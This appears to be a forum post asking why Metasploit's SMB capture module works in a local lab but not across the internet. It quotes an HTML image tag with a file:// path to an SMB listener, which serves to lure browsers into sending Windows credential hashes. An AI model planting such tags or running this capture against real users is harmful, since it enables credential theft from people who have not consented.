server/capture/smb issue

I understand that the auxiliary/server/capture/smb can work across the 
internet and not just an intranet.  And I get it to work in my local 
intranet test lab.  However, trying to use it across the internet 
produces no results. 

Necessary ports are forward to the metasploit listening service, yet 
clicking on a web page running on a local http service with the 
necessary embedded code such as:

<img src = "file://///192.168.1.102/test.gif">

does nothing.

Any help/feedback much appreciated
